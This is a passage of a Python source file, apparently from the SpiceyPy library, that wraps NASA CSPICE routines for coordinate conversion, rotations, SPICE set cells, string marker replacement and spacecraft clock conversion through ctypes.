    :rtype: 3-Element Array of floats
    """
    rectangular = stypes.emptyDoubleVector(3)
    libspice.radrec_c(ctypes.c_double(inrange),
                      ctypes.c_double(re),
                      ctypes.c_double(dec),
                      rectangular)
    return stypes.cVectorToPython(rectangular)
@spiceErrorCheck
def rav2xf(rot, av):
    """
    This routine determines a state transformation matrix
    from a rotation matrix and the angular velocity of the
    rotation.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rav2xf_c.html

    :param rot: Rotation matrix (3x3 floats).
    :param av: Angular velocity vector (3 floats).
    :return: State transformation associated with rot and av.
    :rtype: 6x6-Element Array of floats
    """
    # State transformations are 6x6, unlike the default 3x3 matrix.
    state_xform = stypes.emptyDoubleMatrix(x=6, y=6)
    libspice.rav2xf_c(stypes.toDoubleMatrix(rot),
                      stypes.toDoubleVector(av),
                      state_xform)
    return stypes.cMatrixToNumpy(state_xform)
@spiceErrorCheck
def raxisa(matrix):
    """
    Compute the axis of the rotation given by an input matrix
    and the angle of the rotation about that axis.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/raxisa_c.html

    :param matrix: Rotation matrix (3x3 floats).
    :return: Axis of the rotation, Angle through which the rotation is
        performed
    :rtype: tuple
    """
    rotation_axis = stypes.emptyDoubleVector(3)
    rotation_angle = ctypes.c_double()
    libspice.raxisa_c(stypes.toDoubleMatrix(matrix), rotation_axis,
                      ctypes.byref(rotation_angle))
    return stypes.cVectorToPython(rotation_axis), rotation_angle.value
@spiceErrorCheck
def rdtext(file, lenout=_default_len_out):  # pragma: no cover
    """
    Read the next line of text from a text file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rdtext_c.html

    :param file: Name of text file (str).
    :param lenout: Available room in output line (int).
    :return: Next line from the text file, End-of-file indicator
    :rtype: tuple
    """
    # Allocate the output line buffer before lenout is rebound to its
    # ctypes form.
    line = stypes.stringToCharP(lenout)
    lenout = ctypes.c_int(lenout)
    eof = ctypes.c_int()
    libspice.rdtext_c(stypes.stringToCharP(file), lenout, line,
                      ctypes.byref(eof))
    return stypes.toPythonString(line), bool(eof.value)
@spiceErrorCheck
def reccyl(rectan):
    """
    Convert from rectangular to cylindrical coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reccyl_c.html

    :param rectan: Rectangular coordinates of a point (3 floats).
    :return: Distance from z axis,
        Angle (radians) from xZ plane,
        Height above xY plane.
    :rtype: tuple
    """
    radius = ctypes.c_double(0)
    lon = ctypes.c_double(0)
    z = ctypes.c_double(0)
    libspice.reccyl_c(stypes.toDoubleVector(rectan),
                      ctypes.byref(radius),
                      ctypes.byref(lon),
                      ctypes.byref(z))
    return radius.value, lon.value, z.value
@spiceErrorCheck
def recgeo(rectan, re, f):
    """
    Convert from rectangular coordinates to geodetic coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recgeo_c.html

    :param rectan: Rectangular coordinates of a point (3 floats).
    :param re: Equatorial radius of the reference spheroid (float).
    :param f: Flattening coefficient (float).
    :return: Geodetic longitude (radians),
        Geodetic latitude (radians),
        Altitude above reference spheroid
    :rtype: tuple
    """
    lon = ctypes.c_double(0)
    lat = ctypes.c_double(0)
    altitude = ctypes.c_double(0)
    libspice.recgeo_c(stypes.toDoubleVector(rectan),
                      ctypes.c_double(re),
                      ctypes.c_double(f),
                      ctypes.byref(lon),
                      ctypes.byref(lat),
                      ctypes.byref(altitude))
    return lon.value, lat.value, altitude.value
@spiceErrorCheck
def reclat(rectan):
    """
    Convert from rectangular coordinates to latitudinal coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reclat_c.html

    :param rectan: Rectangular coordinates of a point (3 floats).
    :return: Distance from the origin, Longitude in radians,
        Latitude in radians
    :rtype: tuple
    """
    radius = ctypes.c_double(0)
    lon = ctypes.c_double(0)
    lat = ctypes.c_double(0)
    libspice.reclat_c(stypes.toDoubleVector(rectan),
                      ctypes.byref(radius),
                      ctypes.byref(lon),
                      ctypes.byref(lat))
    return radius.value, lon.value, lat.value
@spiceErrorCheck
def recpgr(body, rectan, re, f):
    """
    Convert rectangular coordinates to planetographic coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recpgr_c.html

    :param body: Body with which coordinate system is associated (str).
    :param rectan: Rectangular coordinates of a point (3 floats).
    :param re: Equatorial radius of the reference spheroid (float).
    :param f: Flattening coefficient (float).
    :return: Planetographic longitude (radians),
        Planetographic latitude (radians),
        Altitude above reference spheroid
    :rtype: tuple
    """
    lon = ctypes.c_double()
    lat = ctypes.c_double()
    altitude = ctypes.c_double()
    libspice.recpgr_c(stypes.stringToCharP(body),
                      stypes.toDoubleVector(rectan),
                      ctypes.c_double(re),
                      ctypes.c_double(f),
                      ctypes.byref(lon),
                      ctypes.byref(lat),
                      ctypes.byref(altitude))
    return lon.value, lat.value, altitude.value
@spiceErrorCheck
def recrad(rectan):
    """
    Convert rectangular coordinates to range, right ascension, and
    declination.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recrad_c.html

    :param rectan: Rectangular coordinates of a point (3 floats).
    :return: Distance of the point from the origin,
        Right ascension in radians,
        Declination in radians
    :rtype: tuple
    """
    distance = ctypes.c_double()
    right_ascension = ctypes.c_double()
    declination = ctypes.c_double()
    libspice.recrad_c(stypes.toDoubleVector(rectan),
                      ctypes.byref(distance),
                      ctypes.byref(right_ascension),
                      ctypes.byref(declination))
    return distance.value, right_ascension.value, declination.value
@spiceErrorCheck
def recsph(rectan):
    """
    Convert from rectangular coordinates to spherical coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recsph_c.html

    :param rectan: Rectangular coordinates of a point (3 floats).
    :return: Distance from the origin,
        Angle from the positive Z-axis,
        Longitude in radians.
    :rtype: tuple
    """
    radius = ctypes.c_double()
    colatitude = ctypes.c_double()
    lon = ctypes.c_double()
    libspice.recsph_c(stypes.toDoubleVector(rectan),
                      ctypes.byref(radius),
                      ctypes.byref(colatitude),
                      ctypes.byref(lon))
    return radius.value, colatitude.value, lon.value
@spiceErrorCheck
def removc(item, inset):
    """
    Remove an item from a character set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removc_c.html

    :param item: Item to be removed (str).
    :param inset: Set to be updated, modified in place
        (spiceypy.utils.support_types.SpiceCell).
    """
    assert isinstance(inset, stypes.SpiceCell)
    # dtype 0 marks a character cell.
    assert inset.dtype == 0
    libspice.removc_c(stypes.stringToCharP(item), ctypes.byref(inset))
@spiceErrorCheck
def removd(item, inset):
    """
    Remove an item from a double precision set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removd_c.html

    :param item: Item to be removed (float).
    :param inset: Set to be updated, modified in place
        (spiceypy.utils.support_types.SpiceCell).
    """
    assert isinstance(inset, stypes.SpiceCell)
    # dtype 1 marks a double precision cell.
    assert inset.dtype == 1
    libspice.removd_c(ctypes.c_double(item), ctypes.byref(inset))
@spiceErrorCheck
def removi(item, inset):
    """
    Remove an item from an integer set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removi_c.html

    :param item: Item to be removed (int).
    :param inset: Set to be updated, modified in place
        (spiceypy.utils.support_types.SpiceCell).
    """
    assert isinstance(inset, stypes.SpiceCell)
    # dtype 2 marks an integer cell.
    assert inset.dtype == 2
    libspice.removi_c(ctypes.c_int(item), ctypes.byref(inset))
@spiceErrorCheck
def reordc(iorder, ndim, lenvals, array):
    """
    Re-order the elements of an array of character strings
    according to a given order vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordc_c.html

    :param iorder: Order vector to be used to re-order array.
    :type iorder: Array of ints
    :param ndim: Dimension of array.
    :type ndim: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Array to be re-ordered.
    :type array: Array of strs
    :return: Re-ordered Array.
    :rtype: Array of strs
    """
    iorder = stypes.toIntVector(iorder)
    ndim = ctypes.c_int(ndim)
    # +1 leaves room for the terminating null of each C string.
    lenvals = ctypes.c_int(lenvals + 1)
    # The 2-D char buffer is reordered in place by the C routine.
    array = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
    libspice.reordc_c(iorder, ndim, lenvals, array)
    return [stypes.toPythonString(x.value) for x in array]
@spiceErrorCheck
def reordd(iorder, ndim, array):
    """
    Re-order the elements of a double precision array according to
    a given order vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordd_c.html

    :param iorder: Order vector to be used to re-order array (ints).
    :param ndim: Dimension of array (int).
    :param array: Array to be re-ordered (floats).
    :return: Re-ordered Array.
    :rtype: Array of floats
    """
    # The C routine permutes the buffer in place; keep a handle so we
    # can convert it back afterwards.
    buffer = stypes.toDoubleVector(array)
    libspice.reordd_c(stypes.toIntVector(iorder), ctypes.c_int(ndim),
                      buffer)
    return stypes.cVectorToPython(buffer)
@spiceErrorCheck
def reordi(iorder, ndim, array):
    """
    Re-order the elements of an integer array according to
    a given order vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordi_c.html

    :param iorder: Order vector to be used to re-order array (ints).
    :param ndim: Dimension of array (int).
    :param array: Array to be re-ordered (ints).
    :return: Re-ordered Array.
    :rtype: Array of ints
    """
    # The C routine permutes the buffer in place; keep a handle so we
    # can convert it back afterwards.
    buffer = stypes.toIntVector(array)
    libspice.reordi_c(stypes.toIntVector(iorder), ctypes.c_int(ndim),
                      buffer)
    return stypes.cVectorToPython(buffer)
@spiceErrorCheck
def reordl(iorder, ndim, array):
    """
    Re-order the elements of a logical (Boolean) array according to
    a given order vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordl_c.html

    :param iorder: Order vector to be used to re-order array (ints).
    :param ndim: Dimension of array (int).
    :param array: Array to be re-ordered (ints).
    :return: Re-ordered Array.
    :rtype: Array of bools
    """
    # Logicals travel as C ints; the buffer is permuted in place and
    # converted back to Python bools on the way out.
    buffer = stypes.toIntVector(array)
    libspice.reordl_c(stypes.toIntVector(iorder), ctypes.c_int(ndim),
                      buffer)
    return stypes.cIntVectorToBoolPython(buffer)
@spiceErrorCheck
def repmc(instr, marker, value, lenout=None):
    """
    Replace a marker with a character string.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmc_c.html

    :param instr: Input string (str).
    :param marker: Marker to be replaced (str).
    :param value: Replacement value (str).
    :param lenout: Optional available space in output string (int).
    :return: Output string.
    :rtype: str
    """
    if lenout is None:
        # Default output size: input plus replacement plus slack.
        lenout = ctypes.c_int(len(instr) + len(value) + len(marker) + 15)
    out = stypes.stringToCharP(lenout)
    libspice.repmc_c(stypes.stringToCharP(instr),
                     stypes.stringToCharP(marker),
                     stypes.stringToCharP(value),
                     lenout, out)
    return stypes.toPythonString(out)
@spiceErrorCheck
def repmct(instr, marker, value, repcase, lenout=None):
    """
    Replace a marker with the text representation of a
    cardinal number.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmct_c.html

    :param instr: Input string (str).
    :param marker: Marker to be replaced (str).
    :param value: Replacement value (int).
    :param repcase: Case of replacement text (str).
    :param lenout: Optional available space in output string (int).
    :return: Output string.
    :rtype: str
    """
    if lenout is None:
        # Default output size: input plus marker plus slack.
        lenout = ctypes.c_int(len(instr) + len(marker) + 15)
    out = stypes.stringToCharP(lenout)
    libspice.repmct_c(stypes.stringToCharP(instr),
                      stypes.stringToCharP(marker),
                      ctypes.c_int(value),
                      ctypes.c_char(repcase.encode(encoding='UTF-8')),
                      lenout, out)
    return stypes.toPythonString(out)
@spiceErrorCheck
def repmd(instr, marker, value, sigdig, lenout=None):
    """
    Replace a marker with a double precision number.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmd_c.html

    :param instr: Input string.
    :type instr: str
    :param marker: Marker to be replaced.
    :type marker: str
    :param value: Replacement value.
    :type value: float
    :param sigdig: Significant digits in replacement text.
    :type sigdig: int
    :param lenout: Optional available space in output string.
    :type lenout: int
    :return: Output string.
    :rtype: str
    """
    # Optional lenout added for consistency with the sibling repm*
    # wrappers (repmc, repmf, repmi, repmot); the default reproduces
    # the previous fixed sizing, so existing callers are unaffected.
    if lenout is None:
        lenout = ctypes.c_int(len(instr) + len(marker) + 15)
    instr = stypes.stringToCharP(instr)
    marker = stypes.stringToCharP(marker)
    value = ctypes.c_double(value)
    sigdig = ctypes.c_int(sigdig)
    out = stypes.stringToCharP(lenout)
    libspice.repmd_c(instr, marker, value, sigdig, lenout, out)
    return stypes.toPythonString(out)
@spiceErrorCheck
def repmf(instr, marker, value, sigdig, informat, lenout=None):
    """
    Replace a marker in a string with a formatted double precision value.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmf_c.html

    :param instr: Input string (str).
    :param marker: Marker to be replaced (str).
    :param value: Replacement value (float).
    :param sigdig: Significant digits in replacement text (int).
    :param informat: Format 'E' or 'F' (str).
    :param lenout: Optional available space in output string (int).
    :return: Output string.
    :rtype: str
    """
    if lenout is None:
        # Default output size: input plus marker plus slack.
        lenout = ctypes.c_int(len(instr) + len(marker) + 15)
    out = stypes.stringToCharP(lenout)
    libspice.repmf_c(stypes.stringToCharP(instr),
                     stypes.stringToCharP(marker),
                     ctypes.c_double(value),
                     ctypes.c_int(sigdig),
                     ctypes.c_char(informat.encode(encoding='UTF-8')),
                     lenout, out)
    return stypes.toPythonString(out)
@spiceErrorCheck
def repmi(instr, marker, value, lenout=None):
    """
    Replace a marker with an integer.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmi_c.html

    :param instr: Input string (str).
    :param marker: Marker to be replaced (str).
    :param value: Replacement value (int).
    :param lenout: Optional available space in output string (int).
    :return: Output string.
    :rtype: str
    """
    if lenout is None:
        # Default output size: input plus marker plus slack.
        lenout = ctypes.c_int(len(instr) + len(marker) + 15)
    out = stypes.stringToCharP(lenout)
    libspice.repmi_c(stypes.stringToCharP(instr),
                     stypes.stringToCharP(marker),
                     ctypes.c_int(value),
                     lenout, out)
    return stypes.toPythonString(out)
@spiceErrorCheck
def repmot(instr, marker, value, repcase, lenout=None):
    """
    Replace a marker with the text representation of an ordinal number.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmot_c.html

    :param instr: Input string (str).
    :param marker: Marker to be replaced (str).
    :param value: Replacement value (int).
    :param repcase: Case of replacement text (str).
    :param lenout: Optional available space in output string (int).
    :return: Output string.
    :rtype: str
    """
    if lenout is None:
        # Default output size: input plus marker plus slack.
        lenout = ctypes.c_int(len(instr) + len(marker) + 15)
    out = stypes.stringToCharP(lenout)
    libspice.repmot_c(stypes.stringToCharP(instr),
                      stypes.stringToCharP(marker),
                      ctypes.c_int(value),
                      ctypes.c_char(repcase.encode(encoding='UTF-8')),
                      lenout, out)
    return stypes.toPythonString(out)
def reset():
    """
    Reset the SPICE error status to a value of "no error."
    As a result, the status routine, failed, will return a value
    of False.

    Deliberately not wrapped in @spiceErrorCheck: this routine clears
    the error state rather than reporting it.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reset_c.html
    """
    libspice.reset_c()
@spiceErrorCheck
def return_c():
    """
    True if SPICE routines should return immediately upon entry.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/return_c.html

    :return: True if SPICE routines should return immediately upon entry.
    :rtype: bool
    """
    # The C routine yields a SpiceBoolean (int); normalize to a Python bool.
    return bool(libspice.return_c())
@spiceErrorCheck
def rotate(angle, iaxis):
    """
    Calculate the 3x3 rotation matrix generated by a rotation
    of a specified angle about a specified axis. This rotation
    is thought of as rotating the coordinate system.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotate_c.html

    :param angle: Angle of rotation in radians (float).
    :param iaxis: Axis of rotation X=1, Y=2, Z=3 (int).
    :return: Resulting rotation matrix
    :rtype: 3x3-Element Array of floats
    """
    rotation = stypes.emptyDoubleMatrix()
    libspice.rotate_c(ctypes.c_double(angle), ctypes.c_int(iaxis),
                      rotation)
    return stypes.cMatrixToNumpy(rotation)
@spiceErrorCheck
def rotmat(m1, angle, iaxis):
    """
    Rotmat applies a rotation of angle radians about axis iaxis to a
    matrix. This rotation is thought of as rotating the coordinate
    system.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotmat_c.html

    :param m1: Matrix to be rotated (3x3 floats).
    :param angle: Angle of rotation in radians (float).
    :param iaxis: Axis of rotation X=1, Y=2, Z=3 (int).
    :return: Resulting rotated matrix.
    :rtype: 3x3-Element Array of floats
    """
    rotated = stypes.emptyDoubleMatrix()
    libspice.rotmat_c(stypes.toDoubleMatrix(m1),
                      ctypes.c_double(angle),
                      ctypes.c_int(iaxis),
                      rotated)
    return stypes.cMatrixToNumpy(rotated)
@spiceErrorCheck
def rotvec(v1, angle, iaxis):
    """
    Transform a vector into a coordinate system rotated by ``angle`` radians
    about axis ``iaxis``; equivalently, rotate ``v1`` by that angle about the
    specified axis.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotvec_c.html

    :param v1: Vector whose coordinate system is to be rotated.
    :type v1: 3-Element Array of floats
    :param angle: Angle of rotation (radians).
    :type angle: float
    :param iaxis: Axis of rotation X=1, Y=2, Z=3.
    :type iaxis: int
    :return: the vector expressed in the new coordinate system.
    :rtype: 3-Element Array of floats
    """
    in_vec = stypes.toDoubleVector(v1)
    c_angle = ctypes.c_double(angle)
    c_iaxis = ctypes.c_int(iaxis)
    out_vec = stypes.emptyDoubleVector(3)
    libspice.rotvec_c(in_vec, c_angle, c_iaxis, out_vec)
    return stypes.cVectorToPython(out_vec)
@spiceErrorCheck
def rpd():
    """
    Return the number of radians per degree, i.e. pi/180.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rpd_c.html

    :return: The number of radians per degree, pi/180.
    :rtype: float
    """
    # The constant is computed on the CSPICE side; no marshalling required.
    return libspice.rpd_c()
@spiceErrorCheck
def rquad(a, b, c):
    """
    Find the roots of the quadratic equation with the given coefficients.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rquad_c.html

    :param a: Coefficient of quadratic term.
    :type a: float
    :param b: Coefficient of linear term.
    :type b: float
    :param c: Constant.
    :type c: float
    :return: Root built from positive and negative discriminant term.
    :rtype: tuple
    """
    quad_coeff = ctypes.c_double(a)
    lin_coeff = ctypes.c_double(b)
    const_coeff = ctypes.c_double(c)
    # CSPICE fills two 2-element output buffers, one per root.
    pos_root = stypes.emptyDoubleVector(2)
    neg_root = stypes.emptyDoubleVector(2)
    libspice.rquad_c(quad_coeff, lin_coeff, const_coeff, pos_root, neg_root)
    return stypes.cVectorToPython(pos_root), stypes.cVectorToPython(neg_root)
################################################################################
# S
@spiceErrorCheck
def saelgv(vec1, vec2):
    """
    Find the semi-axis vectors of the ellipse generated by two arbitrary
    three-dimensional vectors.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/saelgv_c.html

    :param vec1: First vector used to generate an ellipse.
    :type vec1: 3-Element Array of floats
    :param vec2: Second vector used to generate an ellipse.
    :type vec2: 3-Element Array of floats
    :return: Semi-major axis of ellipse, Semi-minor axis of ellipse.
    :rtype: tuple
    """
    gen_vec1 = stypes.toDoubleVector(vec1)
    gen_vec2 = stypes.toDoubleVector(vec2)
    major_axis = stypes.emptyDoubleVector(3)
    minor_axis = stypes.emptyDoubleVector(3)
    libspice.saelgv_c(gen_vec1, gen_vec2, major_axis, minor_axis)
    return stypes.cVectorToPython(major_axis), stypes.cVectorToPython(minor_axis)
@spiceErrorCheck
def scard(incard, cell):
    """
    Set the cardinality of a SPICE cell of any data type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scard_c.html

    :param incard: Cardinality of (number of elements in) the cell.
    :type incard: int
    :param cell: The cell.
    :type cell: spiceypy.utils.support_types.SpiceCell
    :return: The updated Cell.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cell, stypes.SpiceCell)
    c_card = ctypes.c_int(incard)
    # The cell is updated in place; it is also returned for convenience.
    libspice.scard_c(c_card, ctypes.byref(cell))
    return cell
@spiceErrorCheck
def scdecd(sc, sclkdp, lenout=_default_len_out, MXPART=None):
    # todo: figure out how to use mxpart
    """
    Convert double precision encoding of spacecraft clock time into
    a character representation.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scdecd_c.html

    :param sc: NAIF spacecraft identification code.
    :type sc: int
    :param sclkdp: Encoded representation of a spacecraft clock count.
    :type sclkdp: float
    :param lenout: Maximum allowed length of output SCLK string.
    :type lenout: int
    :param MXPART: Maximum number of spacecraft clock partitions.
        NOTE(review): currently accepted but ignored (see todo above).
    :type MXPART: int
    :return: Character representation of a clock count.
    :rtype: str
    """
    sc = ctypes.c_int(sc)
    sclkdp = ctypes.c_double(sclkdp)
    # Allocate the output buffer while lenout is still a Python int;
    # lenout is rebound to a ctypes int on the next line.
    sclkch = stypes.stringToCharP(" " * lenout)
    lenout = ctypes.c_int(lenout)
    libspice.scdecd_c(sc, sclkdp, lenout, sclkch)
    return stypes.toPythonString(sclkch)
@spiceErrorCheck
def sce2c(sc, et):
    """
    Convert ephemeris seconds past J2000 (ET) to continuous encoded
    spacecraft clock "ticks"; the result is not necessarily integral.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2c_c.html

    :param sc: NAIF spacecraft ID code.
    :type sc: int
    :param et: Ephemeris time, seconds past J2000.
    :type et: float
    :return:
        SCLK, encoded as ticks since spacecraft clock start.
        sclkdp need not be integral.
    :rtype: float
    """
    c_sc = ctypes.c_int(sc)
    c_et = ctypes.c_double(et)
    ticks = ctypes.c_double()
    libspice.sce2c_c(c_sc, c_et, ctypes.byref(ticks))
    return ticks.value
@spiceErrorCheck
def sce2s(sc, et, lenout=_default_len_out):
    """
    Convert an epoch given as ephemeris seconds past J2000 (ET) to a
    character string representation of a spacecraft clock value (SCLK).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2s_c.html

    :param sc: NAIF spacecraft clock ID code.
    :type sc: int
    :param et: Ephemeris time, specified as seconds past J2000.
    :type et: float
    :param lenout: Maximum length of output string.
    :type lenout: int
    :return: An SCLK string.
    :rtype: str
    """
    c_sc = ctypes.c_int(sc)
    c_et = ctypes.c_double(et)
    # Pre-allocate an output buffer of lenout characters.
    buffer = stypes.stringToCharP(" " * lenout)
    c_lenout = ctypes.c_int(lenout)
    libspice.sce2s_c(c_sc, c_et, c_lenout, buffer)
    return stypes.toPythonString(buffer)
@spiceErrorCheck
def sce2t(sc, et):
    """
    Convert ephemeris seconds past J2000 (ET) to integral encoded
    spacecraft clock "ticks". For fractional ticks (required for
    C-kernel production) see :func:`sce2c`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2t_c.html

    :param sc: NAIF spacecraft ID code.
    :type sc: int
    :param et: Ephemeris time, seconds past J2000.
    :type et: float
    :return: SCLK, encoded as ticks since spacecraft clock start.
    :rtype: float
    """
    c_sc = ctypes.c_int(sc)
    c_et = ctypes.c_double(et)
    ticks = ctypes.c_double()
    libspice.sce2t_c(c_sc, c_et, ctypes.byref(ticks))
    return ticks.value
@spiceErrorCheck
def scencd(sc, sclkch, MXPART=None):
    """
    Encode character representation of spacecraft clock time into a
    double precision number.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scencd_c.html

    :param sc: NAIF spacecraft identification code.
    :type sc: int
    :param sclkch: Character representation of a spacecraft clock.
    :type sclkch: str
    :param MXPART: Maximum number of spacecraft clock partitions.
        NOTE(review): currently accepted but ignored by this wrapper.
    :type MXPART: int
    :return: Encoded representation of the clock count.
    :rtype: float
    """
    sc = ctypes.c_int(sc)
    sclkch = stypes.stringToCharP(sclkch)
    sclkdp = ctypes.c_double()
    libspice.scencd_c(sc, sclkch, ctypes.byref(sclkdp))
    return sclkdp.value
@spiceErrorCheck
def scfmt(sc, ticks, lenout=_default_len_out):
    """
    Convert encoded spacecraft clock ticks to character clock format.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scfmt_c.html

    :param sc: NAIF spacecraft identification code.
    :type sc: int
    :param ticks: Encoded representation of a spacecraft clock count.
    :type ticks: float
    :param lenout: Maximum allowed length of output string.
    :type lenout: int
    :return: Character representation of a clock count.
    :rtype: str
    """
    c_sc = ctypes.c_int(sc)
    c_ticks = ctypes.c_double(ticks)
    # stringToCharP allocates a buffer when handed an int length.
    buffer = stypes.stringToCharP(lenout)
    c_lenout = ctypes.c_int(lenout)
    libspice.scfmt_c(c_sc, c_ticks, c_lenout, buffer)
    return stypes.toPythonString(buffer)
@spiceErrorCheck
def scpart(sc):
    """
    Get spacecraft clock partition information from a spacecraft
    clock kernel file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scpart_c.html

    :param sc: NAIF spacecraft identification code.
    :type sc: int
    :return:
        Array of partition start times,
        Array of partition stop times.
    :rtype: tuple
    """
    sc = ctypes.c_int(sc)
    nparts = ctypes.c_int()  # filled in by CSPICE with the partition count
    # 9999 is the buffer capacity; only the first nparts entries are kept.
    pstart = stypes.emptyDoubleVector(9999)
    pstop = stypes.emptyDoubleVector(9999)
    libspice.scpart_c(sc, nparts, pstart, pstop)
    return stypes.cVectorToPython(pstart)[0:nparts.value], stypes.cVectorToPython(
        pstop)[0:nparts.value]
@spiceErrorCheck
def scs2e(sc, sclkch):
    """
    Convert a spacecraft clock string to ephemeris seconds past J2000 (ET).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scs2e_c.html

    :param sc: NAIF integer code for a spacecraft.
    :type sc: int
    :param sclkch: An SCLK string.
    :type sclkch: str
    :return: Ephemeris time, seconds past J2000.
    :rtype: float
    """
    c_sc = ctypes.c_int(sc)
    clock_str = stypes.stringToCharP(sclkch)
    et = ctypes.c_double()
    libspice.scs2e_c(c_sc, clock_str, ctypes.byref(et))
    return et.value
@spiceErrorCheck
def sct2e(sc, sclkdp):
    """
    Convert encoded spacecraft clock ("ticks") to ephemeris seconds
    past J2000 (ET).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sct2e_c.html

    :param sc: NAIF spacecraft ID code.
    :type sc: int
    :param sclkdp: SCLK, encoded as ticks since spacecraft clock start.
    :type sclkdp: float
    :return: Ephemeris time, seconds past J2000.
    :rtype: float
    """
    c_sc = ctypes.c_int(sc)
    c_ticks = ctypes.c_double(sclkdp)
    et = ctypes.c_double()
    libspice.sct2e_c(c_sc, c_ticks, ctypes.byref(et))
    return et.value
@spiceErrorCheck
def sctiks(sc, clkstr):
    """
    Convert a spacecraft clock format string to a number of "ticks".

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sctiks_c.html

    :param sc: NAIF spacecraft identification code.
    :type sc: int
    :param clkstr: Character representation of a spacecraft clock.
    :type clkstr: str
    :return: Number of ticks represented by the clock string.
    :rtype: float
    """
    c_sc = ctypes.c_int(sc)
    clock_str = stypes.stringToCharP(clkstr)
    tick_count = ctypes.c_double()
    libspice.sctiks_c(c_sc, clock_str, ctypes.byref(tick_count))
    return tick_count.value
@spiceErrorCheck
def sdiff(a, b):
    """
    Take the symmetric difference of two sets of any data type to form a
    third set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sdiff_c.html

    :param a: First input set.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Second input set.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Symmetric difference of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == b.dtype
    # Bug fix: compare dtype with == rather than "is". Identity comparison
    # against int literals only works via CPython's small-int caching and
    # emits a SyntaxWarning on modern Pythons.
    # dtype 0 = character cell, 1 = double cell, 2 = integer cell.
    if a.dtype == 0:
        c = stypes.SPICECHAR_CELL(a.size, a.length)
    elif a.dtype == 1:
        c = stypes.SPICEDOUBLE_CELL(a.size)
    elif a.dtype == 2:
        c = stypes.SPICEINT_CELL(a.size)
    else:
        raise NotImplementedError
    libspice.sdiff_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
def set_c(a, op, b):
    """
    Compare two sets of a common data type with a relational operator.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/set_c.html

    :param a: First set.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param op: Comparison operator.
    :type op: str
    :param b: Second set.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: The function returns the result of the comparison.
    :rtype: bool
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == b.dtype
    assert isinstance(op, str)
    c_op = stypes.stringToCharP(op)
    result = libspice.set_c(ctypes.byref(a), c_op, ctypes.byref(b))
    return bool(result)
@spiceErrorCheck
def setmsg(message):
    """
    Set the value of the current long error message.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/setmsg_c.html

    :param message: A long error message.
    :type message: str
    """
    msg_p = stypes.stringToCharP(message)
    libspice.setmsg_c(msg_p)
@spiceErrorCheck
def shellc(ndim, lenvals, array):
    # This works! looks like this is a mutable 2d char array
    """
    Sort an array of character strings according to the ASCII
    collating sequence using the Shell Sort algorithm.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shellc_c.html

    :param ndim: Dimension of the array.
